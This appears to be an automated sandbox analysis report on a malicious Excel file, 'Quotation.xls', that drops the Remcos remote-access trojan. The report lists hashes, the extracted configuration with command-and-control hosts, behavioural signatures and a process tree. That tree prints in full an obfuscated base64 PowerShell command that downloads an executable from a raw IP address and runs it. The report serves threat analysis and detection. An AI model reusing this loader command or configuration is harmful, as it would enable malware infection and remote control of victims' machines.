Analysis
-
max time kernel
149s -
max time network
134s -
platform
windows7_x64 -
resource
win7-20240704-en -
resource tags
arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system -
submitted
24-07-2024 09:07
Static task
static1
Behavioral task
behavioral1
Sample
Quotation.xls
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
Quotation.xls
Resource
win10v2004-20240709-en
General
-
Target
Quotation.xls
-
Size
1.0MB
-
MD5
7a9a6e2a484c942e9247513bf8420f13
-
SHA1
9a0399a2c75537687cdcaa939adb4a871b56f26e
-
SHA256
c0484101a8ad9d96190d39f100d6a6ed337873df68eb587c74a91b5cdd19cdd5
-
SHA512
a48ad2da1dddb561a8a64414a8576e03180dccc65cedb94e4733c1d7dba3f8881230d6ec7bb10fe495e13e5fc7449585f52921f9d05d3d1f41361e0b99ec3d2c
-
SSDEEP
24576:QCvOsc3umX8S4lMiK4uwQP6DdRgLd5+HKtGboP:QCG2xRISDdRgLQu
Malware Config
Extracted
remcos
2556
bossnacarpet.com:2556
vegetachcnc.com:2556
-
audio_folder
MicRecords
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
chrome-6W1HCC
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Blocklisted process makes network request 3 IoCs
flow pid Process 8 2628 mshta.exe 9 2628 mshta.exe 11 884 powershell.exe -
Downloads MZ/PE file
-
Evasion via Device Credential Deployment 1 IoCs
pid Process 884 powershell.exe -
Executes dropped EXE 1 IoCs
pid Process 1968 winiti.exe -
Loads dropped DLL 1 IoCs
pid Process 884 powershell.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 1968 set thread context of 2928 1968 winiti.exe 41 -
Detected phishing page
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 7 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AddInProcess32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language EXCEL.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
Enumerates system info in registry 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor EXCEL.EXE -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 2848 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 884 powershell.exe 884 powershell.exe 884 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 884 powershell.exe -
Suspicious use of SetWindowsHookEx 7 IoCs
pid Process 2848 EXCEL.EXE 2848 EXCEL.EXE 2848 EXCEL.EXE 2848 EXCEL.EXE 2848 EXCEL.EXE 2848 EXCEL.EXE 2848 EXCEL.EXE -
Suspicious use of WriteProcessMemory 51 IoCs
description pid Process procid_target PID 2628 wrote to memory of 588 2628 mshta.exe 32 PID 2628 wrote to memory of 588 2628 mshta.exe 32 PID 2628 wrote to memory of 588 2628 mshta.exe 32 PID 2628 wrote to memory of 588 2628 mshta.exe 32 PID 588 wrote to memory of 884 588 cmd.exe 34 PID 588 wrote to memory of 884 588 cmd.exe 34 PID 588 wrote to memory of 884 588 cmd.exe 34 PID 588 wrote to memory of 884 588 cmd.exe 34 PID 884 wrote to memory of 1052 884 powershell.exe 35 PID 884 wrote to memory of 1052 884 powershell.exe 35 PID 884 wrote to memory of 1052 884 powershell.exe 35 PID 884 wrote to memory of 1052 884 powershell.exe 35 PID 1052 wrote to memory of 1876 1052 csc.exe 36 PID 1052 wrote to memory of 1876 1052 csc.exe 36 PID 1052 wrote to memory of 1876 1052 csc.exe 36 PID 1052 wrote to memory of 1876 1052 csc.exe 36 PID 884 wrote to memory of 1968 884 powershell.exe 37 PID 884 wrote to memory of 1968 884 powershell.exe 37 PID 884 wrote to memory of 1968 884 powershell.exe 37 PID 884 wrote to memory of 1968 884 powershell.exe 37 PID 1968 wrote to memory of 2868 1968 winiti.exe 39 PID 1968 wrote to memory of 2868 1968 winiti.exe 39 PID 1968 wrote to memory of 2868 1968 winiti.exe 39 PID 1968 wrote to memory of 2868 1968 winiti.exe 39 PID 1968 wrote to memory of 2868 1968 winiti.exe 39 PID 1968 wrote to memory of 2864 1968 winiti.exe 40 PID 1968 wrote to memory of 2864 1968 winiti.exe 40 PID 1968 wrote to memory of 2864 1968 winiti.exe 40 PID 1968 wrote to memory of 2864 1968 winiti.exe 40 PID 1968 wrote to memory of 2864 1968 winiti.exe 40 PID 1968 wrote to memory of 2864 1968 winiti.exe 40 PID 1968 wrote to memory of 2864 1968 winiti.exe 40 PID 1968 wrote to memory of 2864 1968 winiti.exe 40 PID 1968 wrote to memory of 2864 1968 winiti.exe 40 PID 1968 wrote to memory of 2864 1968 winiti.exe 40 PID 1968 wrote to memory of 2864 1968 winiti.exe 40 PID 1968 wrote to memory of 2864 1968 winiti.exe 40 PID 1968 wrote to memory of 2864 1968 winiti.exe 40 PID 1968 wrote to memory of 2928 1968 winiti.exe 41 PID 1968 wrote to memory of 2928 1968 winiti.exe 41 PID 1968 wrote to memory of 2928 1968 winiti.exe 41 PID 1968 wrote to memory of 2928 1968 winiti.exe 41 PID 1968 wrote to memory of 2928 1968 winiti.exe 41 PID 1968 wrote to memory of 2928 1968 winiti.exe 41 PID 1968 wrote to memory of 2928 1968 winiti.exe 41 PID 1968 wrote to memory of 2928 1968 winiti.exe 41 PID 1968 wrote to memory of 2928 1968 winiti.exe 41 PID 1968 wrote to memory of 2928 1968 winiti.exe 41 PID 1968 wrote to memory of 2928 1968 winiti.exe 41 PID 1968 wrote to memory of 2928 1968 winiti.exe 41 PID 1968 wrote to memory of 2928 1968 winiti.exe 41
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\Quotation.xls1⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:2848
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe -Embedding1⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2628 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" "/c PowerShEll -EX BYPASs -NOP -w 1 -C DEViCECrEDEntIaldEPLOyment ; IeX($(iex('[sysTem.TeXt.ENCOdIng]'+[chAR]58+[ChAr]0x3a+'Utf8.gETStRIng([sysTEM.COnveRT]'+[cHAr]58+[CHar]0x3A+'frOMbaSe64StRing('+[char]0x22+'JDVYWE5WZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC10eVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZW1iRVJERUZpbml0SU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVUmxNT24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdLbU8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFljSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ1FpSEtBVCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtGWmN1cW5tYWNILEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYU3gpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInIiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1Fc3BhY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeVVjSHZ3QnF1TWkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNVhYTlZlOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3My4xNDMuNDYvVDIzMDdXL2NzcnNzLmV4ZSIsIiRFTlY6QVBQREFUQVx3aW5pdGkuZXhlIiwwLDApO1NUYXJULVNMZUVwKDMpO3NUQXJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcd2luaXRpLmV4ZSI='+[chAR]0x22+'))')))"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:588 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePowerShEll -EX BYPASs -NOP -w 1 -C DEViCECrEDEntIaldEPLOyment ; IeX($(iex('[sysTem.TeXt.ENCOdIng]'+[chAR]58+[ChAr]0x3a+'Utf8.gETStRIng([sysTEM.COnveRT]'+[cHAr]58+[CHar]0x3A+'frOMbaSe64StRing('+[char]0x22+'JDVYWE5WZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC10eVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZW1iRVJERUZpbml0SU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVUmxNT24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdLbU8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFljSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ1FpSEtBVCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtGWmN1cW5tYWNILEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYU3gpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInIiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1Fc3BhY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeVVjSHZ3QnF1TWkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNVhYTlZlOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3My4xNDMuNDYvVDIzMDdXL2NzcnNzLmV4ZSIsIiRFTlY6QVBQREFUQVx3aW5pdGkuZXhlIiwwLDApO1NUYXJULVNMZUVwKDMpO3NUQXJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcd2luaXRpLmV4ZSI='+[chAR]0x22+'))')))"3⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- Loads dropped DLL
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:884 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\l6tmq1s6.cmdline"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1052 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6D74.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC6D73.tmp"5⤵
- System Location Discovery: System Language Discovery
PID:1876
-
-
-
C:\Users\Admin\AppData\Roaming\winiti.exe"C:\Users\Admin\AppData\Roaming\winiti.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1968 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"5⤵PID:2868
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"5⤵PID:2864
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"5⤵
- System Location Discovery: System Language Discovery
PID:2928
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\2LF9I1AK\gdfc[1].hta
Filesize12KB
MD5a183dcd47ab3d4ad39338dfe7eddff53
SHA14cd5c2dad4510df9516f6d16208bd284add559b5
SHA25685c14a84e7c4d9e2b2ef10bc483f9ae22cfdf3438a2ae818dc8f487a0e455682
SHA5128818b4d8d9bcd37b3d717c6309e825142ea2fd9f0cab68f4ca5232f38e444c90abb75a35e069018cfed867d48f267369bdab67a681a36633e264338adc943791
-
Filesize
1KB
MD5cd9200e66a5fa073a5549f36efb35a50
SHA1c5f1942415b254a8715c92888e19c4e2efbb689b
SHA256beb64070aa5707651ed331e35b53cd295de898c0f547c28cbfe0155415a6a4dc
SHA5120c9b6dd08ccf7524ed00f9ed2c871dd6a7ef36373c8d1603108dd60fd018237f57f7187561d3f36aa33664670993e70110f034c46617e702bd03720bca8212a0
-
Filesize
3KB
MD5958fc6d7cff611120a9297af43662996
SHA1f4b17148eedad42cdf26a1ccd7dc17f252450c68
SHA256aee5f00d12d42d731fa43cbd0c39f2fac387c18f51a9c0332c45a6612c447db3
SHA512a203a478aba35b3cf441f0fad42f708c618965767be9d4dd88f8e5267412fd5e45b11ba118f21af2a786b1fd47e006dc180da71087a20b8f3c36dc360cdf9fd7
-
Filesize
7KB
MD5e70684c20cbbb0ba7c7b8634a0727159
SHA114e5e9df9ad67a941cd7c0cd68f79f9d18d7b5ff
SHA256ac4a8a14046d155b0a0bbcd1b0b19a7f79018d27c70e65957e768323a5db273d
SHA512c2a4556f83a9fcae888b0fc67605ccd01919e6933626b26061e38b465d83519addb8fc9e4c72c5172a877a43bd76124fd86d80410b4dd5673190cd79df60dadb
-
Filesize
2.2MB
MD5f6bf8ada032d17192526ffebb48aed79
SHA1362cb802e430115288638c9d613f00412f1b2519
SHA256153e11471f85de3df5135b0445014698333ff40a9d6c488d291d6517eb19800d
SHA5120a2e5dbcc972d8463a3cd0608bb837e232ed1dd909ea7472ade269abb0ae1d9dfbeecefe505caffabefed02af413ee156aa2917f0ac3547f1431183bfa99639c
-
Filesize
652B
MD5010033bada91ce77a8eae6c96c8627d2
SHA1ee31b5cf1b1974b77766e6b3bccd730524e18a18
SHA256bf4cc1b4b2f823aac74d3b7e3922fbde66c73a56ecda14d7be050f23f0e2223c
SHA51204c6d9269b2a42fb35f83e707839ea1a01f0946d51d9e2e5ee6db668994b4bf75d030207ce7e77eeccf7060d726a00f455339d0011d84a274e6b2889a0ce1f2d
-
Filesize
461B
MD5a83dc0e46bbad233951be9e3fdba130c
SHA1892cfc6827bb1072ec2e26bbf83457497d6a17cb
SHA256aa9a30262c1a7f73a50a10094b1c5eef9584cd05d275b2ed57430b3431aef967
SHA512e02ef7f32d36925b4064b283c5dfe49b2db6fe0df092be7e3e4b3ba6501b840f4d7d86732f63dc4564514e8aef810edc40b42c982b9fb8356b2e5ab6fe580caa
-
Filesize
309B
MD53fce564657419739a0491a5402a8c929
SHA1f405e46f957bdf5d38b310fba68c8175c2acf36d
SHA25647510126de9f30f68ac4fff997269741a20107c7e317800ab4b5e1e2c5688dca
SHA51252b21784bf8520b7fa2e216cb3d925c5b0516c3c89bad08e17eba72ed63acdf655f1f88dd720ce8ab3b64dc0f28246c851bbda29aa16d603a76ae018aaa9c052